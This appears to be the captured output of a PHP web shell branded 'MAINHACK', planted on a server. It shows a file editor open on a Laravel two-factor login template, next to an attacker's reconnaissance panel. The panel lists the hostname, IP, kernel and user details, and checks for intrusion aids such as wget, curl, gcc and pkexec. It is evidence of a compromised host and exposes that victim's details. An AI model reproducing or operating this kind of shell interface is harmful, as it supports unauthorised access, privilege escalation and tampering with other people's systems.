[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: two-factor-challenge.blade.php
<x-guest-layout> <x-jet-authentication-card> <x-slot name="logo"> <x-jet-authentication-card-logo /> </x-slot> <div x-data="{ recovery: false }"> <div class="mb-4 text-sm text-gray-600" x-show="! recovery"> {{ __('Please confirm access to your account by entering the authentication code provided by your authenticator application.') }} </div> <div class="mb-4 text-sm text-gray-600" x-show="recovery"> {{ __('Please confirm access to your account by entering one of your emergency recovery codes.') }} </div> <x-jet-validation-errors class="mb-4" /> <form method="POST" action="{{ route('two-factor.login') }}" class="needs-validation" novalidate> @csrf <div class="mt-4" x-show="! recovery"> <x-jet-label for="code" value="{{ __('Code') }}" /> <x-jet-input id="code" class="block mt-1 w-full" type="text" inputmode="numeric" name="code" autofocus x-ref="code" autocomplete="one-time-code" /> </div> <div class="mt-4" x-show="recovery"> <x-jet-label for="recovery_code" value="{{ __('Recovery Code') }}" /> <x-jet-input id="recovery_code" class="block mt-1 w-full" type="text" name="recovery_code" x-ref="recovery_code" autocomplete="one-time-code" /> </div> <div class="flex items-center justify-end mt-4"> <button type="button" class="text-sm text-gray-600 hover:text-gray-900 underline cursor-pointer" x-show="! recovery" x-on:click=" recovery = true; $nextTick(() => { $refs.recovery_code.focus() }) "> {{ __('Use a recovery code') }} </button> <button type="button" class="text-sm text-gray-600 hover:text-gray-900 underline cursor-pointer" x-show="recovery" x-on:click=" recovery = false; $nextTick(() => { $refs.code.focus() }) "> {{ __('Use an authentication code') }} </button> <x-jet-button class="ml-4"> {{ __('Log in') }} </x-jet-button> </div> </form> </div> </x-jet-authentication-card> </x-guest-layout>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.7 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002